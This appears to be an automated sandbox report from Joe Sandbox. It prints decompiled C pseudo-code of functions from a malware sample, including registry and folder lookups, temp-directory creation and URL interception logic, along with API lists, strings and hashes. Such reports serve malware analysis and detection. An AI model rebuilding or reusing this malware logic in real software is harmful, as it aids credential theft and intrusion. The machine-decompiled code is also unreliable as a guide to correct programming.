0x0040cb38
0x0040cb41
0x0040cb41
0x0040cb48
0x0040cb64
0x0040cb4e
0x0040cb4e
0x0040cb51
0x0040cb55
0x0040cb5b
0x0040cb5d
0x0040cb60
0x00000000
0x00000000
0x0040cb62
0x00000000
0x0040cb60
0x0040cb55
0x0040cb67
0x0040cb67
0x0040cb6d
0x0040cb71
0x0040cb77
0x0040cb7d
0x0040cb7d
0x0040cb84

APIs

Part of subcall function 00409ABB: GetTickCount.KERNEL32 ref: 00409ABB

CharUpperW.USER32(00000000), ref: 0040CB77

Strings

bcdfghklmnpqrstvwxz, xrefs: 0040CA74
aeiouy, xrefs: 0040CA83, 0040CA8C, 0040CAC4, 0040CACD
4@, xrefs: 0040CADE

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: CharCountTickUpper
String ID: aeiouy$bcdfghklmnpqrstvwxz$4@
API String ID: 2674899715-3728361587
Opcode ID: b792e96cf932b2f173157ead514b6e351e3b18aef738bec66ea92c281e851c7a
Instruction ID: 799a3f4752f77c26502a5c04e43b3789bc05b21f5441e2d2ecf0b166c9c55692
Opcode Fuzzy Hash: b792e96cf932b2f173157ead514b6e351e3b18aef738bec66ea92c281e851c7a
Instruction Fuzzy Hash: 95416A71E00619DBCB11EFA5D5866AEBBB4EF40358F14817BD811BB281D37CAE41CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00417288 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00417288(void* __ecx, char* __edx, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v52;
				char _v76;
				char _v116;
				char _v636;
				short _v1156;
				void* __edi;
				void* __esi;
				void* _t28;
				void* _t30;
				void* _t35;
				void* _t39;
				char* _t42;
				void* _t52;
				WCHAR* _t55;
				char* _t60;
				signed int _t61;
				void* _t62;
				intOrPtr _t70;

				_t54 = __edx;
				_t52 = __ecx;
				E00408742( &_v12,  &_v12, 0, 8);
				_t28 = 0x36;
				E00412F05(_t28,  &_v116);
				_t30 = 0x37;
				E00412F05(_t30,  &_v52);
				_t55 =  &_v636;
				_t35 = E0040C7E3(0x80000002, _t52, _t55,  &_v116,  &_v52, 0x104);
				if(_t35 != 0xffffffff) {
					_t65 = _t35;
					if(_t35 > 0) {
						ExpandEnvironmentStringsW(_t55,  &_v1156, 0x104);
						E00417024(_t65,  &_v1156,  &_v12);
					}
				}
				if(_v8 != 0) {
					L9:
					if(_t70 <= 0) {
						return E0040868F(_v12);
					}
					_push(0x39);
					return E00416E46(_t54, _v12);
				} else {
					_t60 =  &_v76;
					_t39 = 0x38;
					E00412F05(_t39, _t60);
					_v28 = 0x23;
					_v24 = 0x1a;
					_v20 = 0x26;
					_v16 = _t60;
					_t61 = 0;
					do {
						_t42 =  &_v636;
						__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t62 + _t61 * 4 - 0x18)), 0, 0, _t42);
						_t68 = _t42;
						if(_t42 == 0) {
							_t54 =  &_v16;
							E0040DE68( &_v636,  &_v16, _t68, 1, 2, E0041707E,  &_v12, 0, 0, 0);
						}
						_t61 = _t61 + 1;
					} while (_t61 < 3);
					_t70 = _v8;
					goto L9;
				}
			}

0x00417288
0x00417288
0x0041729d
0x004172a7
0x004172a8
0x004172b2
0x004172b3
0x004172c6
0x004172d1
0x004172d9
0x004172db
0x004172dd
0x004172ea
0x004172fb
0x004172fb
0x004172dd
0x00417303
0x0041736b
0x0041736b
0x00000000
0x0041737d
0x00417370
0x00000000
0x00417305
0x00417307
0x0041730a
0x0041730b
0x00417312
0x00417319
0x00417320
0x00417327
0x0041732a
0x0041732c
0x0041732c
0x0041733a
0x00417340
0x00417342
0x00417354
0x0041735d
0x0041735d
0x00417362
0x00417363
0x00417368
0x00000000
0x00417368

APIs

Part of subcall function 0040C7E3: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,00406E71,?,?,00000104), ref: 0040C7F8

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000008), ref: 004172EA
SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?,?,?,00000104,?,00000000,00000008), ref: 0041733A

Strings

#, xrefs: 00417312
&, xrefs: 00417320

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: EnvironmentExpandFolderOpenPathStrings
String ID: #$&
API String ID: 1994525040-3870246384
Opcode ID: ee538e6b243f35281a0de6ad36a302a33a95bbd0c4507af895e500c859ec092f
Instruction ID: 6c9cf43c542b7e42f871d7b3cac83de62b92399079fec22071e5d60492e4f19c
Opcode Fuzzy Hash: ee538e6b243f35281a0de6ad36a302a33a95bbd0c4507af895e500c859ec092f
Instruction Fuzzy Hash: C2316FB2D0421CAADF10ABE4DD89ADEB77CEB04308F11456BBA14F7180D6785B858B58

Uniqueness

Uniqueness Score: -1.00%

Function 00417B39 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00417B39(void* __ecx, char* __edx, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v44;
				char _v68;
				char _v120;
				char _v644;
				short _v1164;
				void* __edi;
				void* __esi;
				void* _t28;
				void* _t30;
				void* _t35;
				void* _t39;
				char* _t42;
				void* _t52;
				WCHAR* _t55;
				char* _t60;
				signed int _t61;
				void* _t62;
				intOrPtr _t70;

				_t54 = __edx;
				_t52 = __ecx;
				E00408742( &_v12,  &_v12, 0, 8);
				_t28 = 0x4d;
				E00412F05(_t28,  &_v120);
				_t30 = 0x4e;
				E00412F05(_t30,  &_v44);
				_t55 =  &_v644;
				_t35 = E0040C7E3(0x80000001, _t52, _t55,  &_v120,  &_v44, 0x104);
				if(_t35 != 0xffffffff) {
					_t65 = _t35;
					if(_t35 > 0) {
						ExpandEnvironmentStringsW(_t55,  &_v1164, 0x104);
						E004178D7(_t65,  &_v1164,  &_v12);
					}
				}
				if(_v8 != 0) {
					L9:
					if(_t70 <= 0) {
						return E0040868F(_v12);
					}
					_push(0x50);
					return E00416E46(_t54, _v12);
				} else {
					_t60 =  &_v68;
					_t39 = 0x4f;
					E00412F05(_t39, _t60);
					_v28 = 0x1a;
					_v24 = 0x26;
					_v20 = 0x23;
					_v16 = _t60;
					_t61 = 0;
					do {
						_t42 =  &_v644;
						__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t62 + _t61 * 4 - 0x18)), 0, 0, _t42);
						_t68 = _t42;
						if(_t42 == 0) {
							_t54 =  &_v16;
							E0040DE68( &_v644,  &_v16, _t68, 1, 2, E0041790F,  &_v12, 0, 0, 0);
						}
						_t61 = _t61 + 1;
					} while (_t61 < 3);
					_t70 = _v8;
					goto L9;
				}
			}

0x00417b39
0x00417b39
0x00417b4e
0x00417b58
0x00417b59
0x00417b63
0x00417b64
0x00417b77
0x00417b82
0x00417b8a
0x00417b8c
0x00417b8e
0x00417b9b
0x00417bac
0x00417bac
0x00417b8e
0x00417bb4
0x00417c1c
0x00417c1c
0x00000000
0x00417c2e
0x00417c21
0x00000000
0x00417bb6
0x00417bb8
0x00417bbb
0x00417bbc
0x00417bc3
0x00417bca
0x00417bd1
0x00417bd8
0x00417bdb
0x00417bdd
0x00417bdd
0x00417beb
0x00417bf1
0x00417bf3
0x00417c05
0x00417c0e
0x00417c0e
0x00417c13
0x00417c14
0x00417c19
0x00000000
0x00417c19

APIs

Part of subcall function 0040C7E3: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,00406E71,?,?,00000104), ref: 0040C7F8

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000008), ref: 00417B9B
SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?,?,?,00000104,?,00000000,00000008), ref: 00417BEB

Strings

#, xrefs: 00417BD1
&, xrefs: 00417BCA

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: EnvironmentExpandFolderOpenPathStrings
String ID: #$&
API String ID: 1994525040-3870246384
Opcode ID: 2092c5ee936af943c07fb8eb34a83c168ca8fe6bf15b266883fa107123a07cae
Instruction ID: 4750978a3554cf4bbcc18c66d777c89f3ee565d2bce3aa9dc09290817c358199
Opcode Fuzzy Hash: 2092c5ee936af943c07fb8eb34a83c168ca8fe6bf15b266883fa107123a07cae
Instruction Fuzzy Hash: 853143B2D0011CAADF10AAA1DD89ADE777CEB04318F10456BF605F7181EB785B858BA8

Uniqueness

Uniqueness Score: -1.00%

Function 0041B7D4 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041B7D4(void* __edx) {
				void _v108;
				char _v120;
				char _v212;
				long _v216;
				char _v224;
				void* __esi;
				void* _t8;
				void* _t16;

				_t16 = __edx;
				_t8 = GetThreadDesktop(GetCurrentThreadId());
				if(_t8 != 0) {
					_t8 = GetUserObjectInformationW(_t8, 2,  &_v108, 0x64,  &_v216);
					if(_t8 != 0 && _v216 == 0x4e) {
						E00419DA0(0x2937498d,  &_v212, 0);
						_t8 = E00408700( &_v224,  &_v120, 0x4c);
						if(_t8 == 0) {
							_t8 = E0041B3A3( &_v120, _t16, 0x421ea8, _t8);
							if(_t8 == 0) {
								_t8 = E0041B60D(0x421ea8, 0);
							} else {
								 *0x421868 =  *0x421868 | 0x00000004;
							}
						}
					}
				}
				return _t8;
			}

0x0041b7d4
0x0041b7e8
0x0041b7f0
0x0041b801
0x0041b809
0x0041b81e
0x0041b82d
0x0041b834
0x0041b83c
0x0041b843
0x0041b852
0x0041b845
0x0041b845
0x0041b845
0x0041b843
0x0041b834
0x0041b809
0x0041b85b

APIs

GetCurrentThreadId.KERNEL32 ref: 0041B7E1
GetThreadDesktop.USER32(00000000), ref: 0041B7E8
GetUserObjectInformationW.USER32(00000000,00000002,?,00000064,?), ref: 0041B801

Part of subcall function 0041B3A3: TlsAlloc.KERNEL32(?,0000018C,00000000,00000000), ref: 0041B3B9

Strings

N, xrefs: 0041B80B

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: Thread$AllocCurrentDesktopInformationObjectUser
String ID: N
API String ID: 454308152-1130791706
Opcode ID: d3d8891412d8fd61dbabc338001400c940ccf4614057797258408a4e478b0d9c
Instruction ID: 3da96341f1efdb6e0ec1c64ddc165db1619c05334e1abbfcf3f7dfe3e7db9a64
Opcode Fuzzy Hash: d3d8891412d8fd61dbabc338001400c940ccf4614057797258408a4e478b0d9c
Instruction Fuzzy Hash: 270184715043006AE610BB61DD46FEB739CDB00B14F40853EFA64D21E1EB789984C6DE

Uniqueness

Uniqueness Score: -1.00%

Function 0040DB41 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0040DB41(WCHAR* _a4) {
				short _v524;
				char _v1044;
				void* __edi;
				void* _t11;
				void* _t19;
				void* _t20;

				if(GetTempPathW(0xf6,  &_v524) - 1 > 0xf5) {
					L6:
					return 0;
				}
				_t19 = 0;
				while(1) {
					_push(E00409ABB());
					_push(L"tmp");
					_t18 =  &_v1044;
					_t11 = E00409450(_t10, 0x104,  &_v1044, L"%s%08x");
					_t20 = _t20 + 0xc;
					if(_t11 == 0xffffffff) {
						goto L6;
					}
					if(E0040DFC5(_t18, _a4,  &_v524) == 0 || CreateDirectoryW(_a4, 0) == 0) {
						_t19 = _t19 + 1;
						if(_t19 < 0x64) {
							continue;
						}
						goto L6;
					} else {
						return 1;
					}
				}
				goto L6;
			}

0x0040db64
0x0040dbba
0x00000000
0x0040dbba
0x0040db66
0x0040db68
0x0040db6d
0x0040db6e
0x0040db7d
0x0040db83
0x0040db88
0x0040db8e
0x00000000
0x00000000
0x0040dba3
0x0040dbb4
0x0040dbb8
0x00000000
0x00000000
0x00000000
0x0040dbc2
0x00000000
0x0040dbc2
0x0040dba3
0x00000000

APIs

GetTempPathW.KERNEL32(000000F6,?), ref: 0040DB58

Part of subcall function 00409ABB: GetTickCount.KERNEL32 ref: 00409ABB

Part of subcall function 0040DFC5: PathCombineW.SHLWAPI(?,?,?,0041A149,?,004218C8,00000000,00000032,?), ref: 0040DFE5

CreateDirectoryW.KERNEL32(?,00000000,?,?), ref: 0040DBAA

Strings

tmp, xrefs: 0040DB6E
%s%08x, xrefs: 0040DB73

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: Path$CombineCountCreateDirectoryTempTick
String ID: %s%08x$tmp
API String ID: 1218007593-1196434543
Opcode ID: 576d09082c1ac22ad6fd7a2cdd2aec027eb33c5015c29074387e875fa288ded8
Instruction ID: 5dd4d2f3327ba06d2c5e21d405e2f6928bfacb0dc34662b3c1a3deba2792fd3b
Opcode Fuzzy Hash: 576d09082c1ac22ad6fd7a2cdd2aec027eb33c5015c29074387e875fa288ded8
Instruction Fuzzy Hash: 83F02D75E0021866DA206AA49C05FEB376DDB01724F114173FD15F21E2D2B9EF8A859C

Uniqueness

Uniqueness Score: -1.00%

Function 00412F50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00412F50(WCHAR* __ebx, void* __ecx, char _a4) {
				void* __edi;
				long _t3;
				WCHAR* _t13;

				_t13 = __ebx;
				if( *0x421258 == 0) {
					E0041A0E0(__ecx, 0x421258, 2);
					 *((short*)(E004086CB(0x421460, 0x421258, E00409301(0x421258) + _t10) + 0x421460)) = 0;
					_t3 = PathRemoveFileSpecW(0x421460);
				}
				if(_t13 != 0) {
					E00408A32(_t3 | 0xffffffff, 0x421258, _t13);
					_t3 = PathRenameExtensionW(_t13, L".tmp");
				}
				if(_a4 != 0 &&  *0x421ad4 > 1) {
					E0040DD44(0x421460);
					E0040BD0A(0x421460);
					_t3 = GetFileAttributesW(0x421258);
					if(_t3 != 0xffffffff) {
						return E0040BD0A(0x421258);
					}
				}
				return _t3;
			}

0x00412f50
0x00412f64
0x00412f68
0x00412f81
0x00412f88
0x00412f88
0x00412f90
0x00412f99
0x00412fa4
0x00412fa4
0x00412faf
0x00412fbb
0x00412fc1
0x00412fc7
0x00412fd0
0x00000000
0x00412fd3
0x00412fd0
0x00412fda

APIs

PathRemoveFileSpecW.SHLWAPI(00421460,00421460,00421258,00000000,00000002,00000000,00020000,00413A15,00000001,?,8793AEF0,00000002,00002723,00020000,00000000,00002722), ref: 00412F88
PathRenameExtensionW.SHLWAPI(00000000,.tmp,00000000,00020000,00413A15,00000001,?,8793AEF0,00000002,00002723,00020000,00000000,00002722,00020000,?,?), ref: 00412FA4
GetFileAttributesW.KERNEL32(00421258,00421460,00421460,00000000,00020000,00413A15,00000001,?,8793AEF0,00000002,00002723,00020000,00000000,00002722,00020000,?), ref: 00412FC7

Part of subcall function 0041A0E0: PathRenameExtensionW.SHLWAPI(?,.dat,?,004218C8,00000000,00000032,?), ref: 0041A159

Strings

.tmp, xrefs: 00412F9E

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: Path$ExtensionFileRename$AttributesRemoveSpec
String ID: .tmp
API String ID: 3627892477-2986845003
Opcode ID: 14ea9584e1f35b617ca78df56bf8d4deab50f74ff2b3d94bae3d6d704d5f0a85
Instruction ID: 030b8f0bb7e52fdd6175962ed6b462d21b8c6200cdd7733b55d4d17a58479b9c
Opcode Fuzzy Hash: 14ea9584e1f35b617ca78df56bf8d4deab50f74ff2b3d94bae3d6d704d5f0a85
Instruction Fuzzy Hash: 2CF08F20B0025026D31137265D89BAF55698FA1328F44427FF019F21F2CBFC48C7526D

Uniqueness

Uniqueness Score: -1.00%

Function 00409E9D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 26
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409E9D(void* __ecx) {
				signed int _v8;
				struct HINSTANCE__* _t7;

				_v8 = _v8 & 0x00000000;
				_t7 = GetModuleHandleW(L"kernel32.dll");
				if(_t7 == 0) {
					L4:
					return _t7 & 0xffffff00 | _v8 != 0x00000000;
				} else {
					_t7 = GetProcAddress(_t7, "IsWow64Process");
					if(_t7 == 0) {
						goto L4;
					} else {
						_t7 = _t7->i(0xffffffff,  &_v8);
						if(_t7 != 0) {
							goto L4;
						} else {
							return 0;
						}
					}
				}
			}

0x00409ea1
0x00409eaa
0x00409eb2
0x00409ed4
0x00409edc
0x00409eb4
0x00409eba
0x00409ec2
0x00000000
0x00409ec4
0x00409eca
0x00409ece
0x00000000
0x00409ed0
0x00409ed3
0x00409ed3
0x00409ece
0x00409ec2

APIs

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00409EAA
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00409EBA

Strings

kernel32.dll, xrefs: 00409EA5
IsWow64Process, xrefs: 00409EB4

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: IsWow64Process$kernel32.dll
API String ID: 1646373207-3024904723
Opcode ID: 174ce3e477b89e5caf610bc2a4300cac58e243b108dafe6816d26677e61e68ea
Instruction ID: 65efdc7d9fa2793b477cb9e8dec35189a8f85e2675e8928f5e975b8bbfa683c4
Opcode Fuzzy Hash: 174ce3e477b89e5caf610bc2a4300cac58e243b108dafe6816d26677e61e68ea
Instruction Fuzzy Hash: E4E04830601305B6DF10DB91DD0AB5B779C5B11799F1402B9A011F20D1F77CDF04966C

Uniqueness

Uniqueness Score: -1.00%

Function 0040F527 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040F527(intOrPtr _a4, intOrPtr _a12) {
				void* __esi;
				void* _t6;
				signed int _t7;

				if(_a12 == 0x64 || _a12 == 0x33) {
					EnterCriticalSection(0x421210);
					_t7 = E0040EEF3(_a4);
					if(_t7 != 0xffffffff) {
						_t7 = SetEvent( *(_t7 * 0x24 +  *0x421228 + 4));
					}
					LeaveCriticalSection(0x421210);
					return _t7;
				}
				return _t6;
			}

0x0040f52c
0x0040f53d
0x0040f547
0x0040f54f
0x0040f55e
0x0040f55e
0x0040f565
0x00000000
0x0040f56c
0x0040f56d

APIs

EnterCriticalSection.KERNEL32(00421210), ref: 0040F53D
SetEvent.KERNEL32(?), ref: 0040F55E
LeaveCriticalSection.KERNEL32(00421210), ref: 0040F565

Strings

3, xrefs: 0040F52E

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: CriticalSection$EnterEventLeave
String ID: 3
API String ID: 3094578987-1842515611
Opcode ID: e94739f2d8626e2e382f107d5674af7fad6cb57af778fd93f6854075ca2c165e
Instruction ID: b1b764b1e2ebec8d1d9293779aac8fbd9155053b1abffb59106a032cadf1b142
Opcode Fuzzy Hash: e94739f2d8626e2e382f107d5674af7fad6cb57af778fd93f6854075ca2c165e
Instruction Fuzzy Hash: 66E06D31100100EBC7209B25BD4885EB7A4EA99331B04C97EF025B31B2C7388852CE29

Uniqueness

Uniqueness Score: -1.00%

Function 00412302 Relevance: 6.3, APIs: 4, Instructions: 332
networkCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00412302(intOrPtr _a4) {
				char _v280;
				char _v284;
				char _v372;
				char _v416;
				intOrPtr _v420;
				void* _v428;
				intOrPtr _v468;
				signed int _v472;
				char _v476;
				void* _v488;
				char _v492;
				signed int _v496;
				char _v497;
				intOrPtr* _v500;
				intOrPtr _v504;
				char _v505;
				char* _v508;
				signed char _v512;
				char _v513;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t108;
				void* _t117;
				void* _t121;
				void* _t129;
				void* _t131;
				char* _t134;
				char _t139;
				void* _t141;
				void* _t142;
				void* _t145;
				intOrPtr _t149;
				intOrPtr _t150;
				intOrPtr* _t152;
				intOrPtr _t156;
				void* _t159;
				void* _t160;
				void* _t161;
				int _t166;
				void* _t169;
				char _t172;
				void* _t176;
				signed int _t180;
				signed int _t182;
				void* _t187;
				signed int _t189;
				char* _t190;
				intOrPtr _t191;
				char* _t193;
				struct _SYSTEMTIME _t198;
				struct _SYSTEMTIME _t201;
				intOrPtr _t203;
				intOrPtr* _t204;
				intOrPtr _t206;
				char* _t210;

				_t180 = 0;
				_v496 = 0;
				_v497 = 0xff;
				EnterCriticalSection(0x421234);
				_t188 =  *0x421250;
				if( *0x421250 == 0 ||  *0x42124c == 0) {
					_t206 = _a4;
				} else {
					_t206 = _a4;
					_t194 = 0;
					if(E00411A6E(_t188, 0,  *(_t206 + 8),  *(_t206 + 0xc)) != 0) {
						_t172 = E0041B264();
						_v492 = _t172;
						if(_t172 != 0) {
							_t176 = E00411B2E(0, 4,  &_v492,  *0x42124c);
							_push(_v504);
							if(_t176 == 0) {
								E0040868F();
							}
							E0041B2CF(_t188);
						}
						E0040868F( *0x42124c);
						E0040868F( *0x421250);
						 *0x42124c = _t180;
						 *0x421250 = _t180;
					}
				}
				LeaveCriticalSection(0x421234);
				_t108 =  *((intOrPtr*)(_t206 + 0x34));
				_t220 = _t108 - _t180;
				if(_t108 == _t180) {
					L33:
					if((_v496 & 0x00000001) == 0) {
						_t150 =  *((intOrPtr*)(_t206 + 0x38));
						_t238 = _t150 - _t180;
						if(_t150 != _t180 && E00411D0A(_t188, _t194, _t238, 3, _t150,  *(_t206 + 8),  *(_t206 + 0xc), _t180) != 0) {
							_v496 = _v496 | 0x00000001;
						}
					}
					if( *((intOrPtr*)(_t206 + 0x20)) >= 0x21) {
						_t145 = 0xc;
						E00412ECF(_t145,  &_v476);
						_t203 =  *((intOrPtr*)(_t206 + 0x1c));
						if(E00408700( &_v476, _t203, 0x21) == 0) {
							_t149 =  *((intOrPtr*)(_t203 + 0x21));
							if(_t149 == 0x3b || _t149 == 0) {
								_v496 = _v496 | 0x00000010;
							}
						}
					}
					_t189 = 8;
					if(_v497 != 0xff) {
						__eflags = _v497 - 1;
						if(_v497 != 1) {
							goto L52;
						}
						goto L51;
					} else {
						if( *((char*)(_t206 + 0x18)) != 1 ||  *(_t206 + 0x28) <= _t180) {
							L52:
							if((_v496 & _t189) == 0) {
								L80:
								if((_v496 & 0x00000001) == 0) {
									if(E00411D72(_t194, _t206) != 0) {
										_v496 = _v496 | 0x00000002;
									}
									if((_v496 & 0x00000010) != 0 && E00412113(_t206, _t194) != 0) {
										_v496 = _v496 | 0x00000004;
									}
								}
								return _v496;
							}
							_t113 =  *(_t206 + 0x28);
							_v497 = 0;
							if( *(_t206 + 0x28) != _t180) {
								__eflags = _v496 & 0x00000010;
								if((_v496 & 0x00000010) == 0) {
									__eflags =  *((intOrPtr*)(_t206 + 0x20)) - _t180;
									if( *((intOrPtr*)(_t206 + 0x20)) != _t180) {
										L79:
										_v496 = _v496 & 0xfffffff7;
										goto L80;
									}
									_t198 =  &_v488;
									E00412ECF(_t189, _t198);
									_push(_t198);
									_push(9);
									L66:
									_pop(_t117);
									_t182 = E00408AEF(_t117);
									L67:
									if(_t182 == 0) {
										goto L79;
									}
									E0041AF60( &_v492);
									_t121 = E004088D2( *(_t206 + 0xc), 0,  *(_t206 + 8));
									_t200 = _t121;
									if(_t121 != 0) {
										_t194 = 0x3c;
										E00408742( &_v416,  &_v416, 0, _t194);
										_v428 = _t194;
										if(InternetCrackUrlA( *(_t206 + 8),  *(_t206 + 0xc), 0,  &_v428) == 1) {
											_t129 = 6;
											E00412F05(_t129,  &_v372);
											_t131 = 9;
											E00412F05(_t131,  &_v492);
											_t210 = _v508;
											_t190 = 0x403270;
											if(_t210 == 0) {
												_t210 = 0x403270;
											}
											_t134 =  *(_a4 + 0x10);
											if(_t134 == 0) {
												_t134 = "-";
											}
											if((_v512 & 0x00000001) != 0) {
												_t190 =  &_v492;
											}
											_push(_t182);
											_push(_t210);
											_push(_t134);
											_push(_t190);
											_t139 = E00413AE4(_t190, _t194, (0 | _v420 == 0x00000004) + 0xb, (0 | _v420 == 0x00000004) + 0xb, _t200, 0,  &_v372, _t200);
											_t206 = _a4;
											_v513 = _t139;
										}
										E0040868F(_t200);
									}
									E0040868F(_v492);
									E0040868F(_t182);
									if(_v505 != 0) {
										goto L80;
									} else {
										goto L79;
									}
								}
								_t182 = E00408AEF(_t113,  *((intOrPtr*)(_t206 + 0x24)));
								_t141 = 0;
								__eflags = _t182;
								if(_t182 == 0) {
									goto L79;
								}
								__eflags =  *(_t206 + 0x28);
								if( *(_t206 + 0x28) <= 0) {
									goto L67;
								} else {
									goto L58;
								}
								do {
									L58:
									_t191 =  *((intOrPtr*)(_t141 + _t182));
									__eflags = _t191 - 0x26;
									if(_t191 != 0x26) {
										__eflags = _t191 - 0x2b;
										if(_t191 == 0x2b) {
											 *((char*)(_t141 + _t182)) = 0x20;
										}
									} else {
										 *((char*)(_t141 + _t182)) = 0xa;
									}
									_t141 = _t141 + 1;
									__eflags = _t141 -  *(_t206 + 0x28);
								} while (_t141 <  *(_t206 + 0x28));
								goto L67;
							}
							_t201 =  &_v488;
							_t142 = 7;
							E00412ECF(_t142, _t201);
							_push(_t201);
							_push(7);
							goto L66;
						} else {
							L51:
							_v496 = _v496 | _t189;
							goto L52;
						}
					}
				}
				_t152 = E0040E2AD( &_v492, _t194, _t220, _t108, 0x4e25, 0x10000000);
				_t188 = _v504;
				_t204 = _t152;
				_v500 = _t204;
				if(E004095A8(_t152, _v504) == 0) {
					L32:
					E0040868F(_v488);
					_t180 = 0;
					goto L33;
				} else {
					goto L11;
				}
				do {
					L11:
					_t14 = _t204 + 1; // 0x1
					_t193 = _t14;
					if( *_t193 == 0) {
						goto L31;
					}
					_t156 =  *_t204;
					if(_t156 == 0x21) {
						L21:
						_t204 = _t193;
						L22:
						_t194 = 0;
						_t188 = _t204;
						if(E00411A6E(_t204, 0,  *(_t206 + 8),  *(_t206 + 0xc)) == 0) {
							goto L31;
						}
						_t159 = _t187;
						if(_t159 == 0) {
							L29:
							_v497 = 1;
							L30:
							if(_t187 != 2) {
								goto L32;
							}
							goto L31;
						}
						_t160 = _t159 - 1;
						if(_t160 == 0) {
							_v497 = 0;
							goto L30;
						}
						_t161 = _t160 - 1;
						if(_t161 == 0) {
							_t194 = 0x3c;
							E00408742( &_v476,  &_v476, 0, 0);
							_v472 =  &_v280;
							_v488 = 0;
							_v468 = 0x103;
							_t166 = InternetCrackUrlA( *(_t206 + 8),  *(_t206 + 0xc), 0,  &_v488);
							__eflags = _t166 - 1;
							if(_t166 == 1) {
								__eflags = _v472;
								if(_v472 > 0) {
									E0041AF1A( &_v284);
								}
							}
							goto L30;
						}
						_t169 = _t161 - 1;
						if(_t169 == 0 || _t169 == 1) {
							_v496 = _v496 | 0x00000001;
							goto L29;
						} else {
							goto L30;
						}
					}
					if(_t156 == 0x2d) {
						goto L21;
					}
					if(_t156 == 0x40) {
						goto L21;
					}
					if(_t156 == 0x5e) {
						_t187 = 4;
						goto L21;
					} else {
						_t187 = 0;
						goto L22;
					}
					L31:
					_t188 = _t204;
					_t204 = E004095E6(_t204, 1);
				} while (_t204 != 0);
				goto L32;
			}

0x00412316
0x00412319
0x0041231d
0x00412322
0x00412328
0x00412330
0x004123a4
0x0041233a
0x0041233a
0x00412340
0x0041234c
0x0041234e
0x00412353
0x00412359
0x00412368
0x0041236d
0x00412373
0x00412375
0x0041237a
0x0041237b
0x0041237b
0x00412386
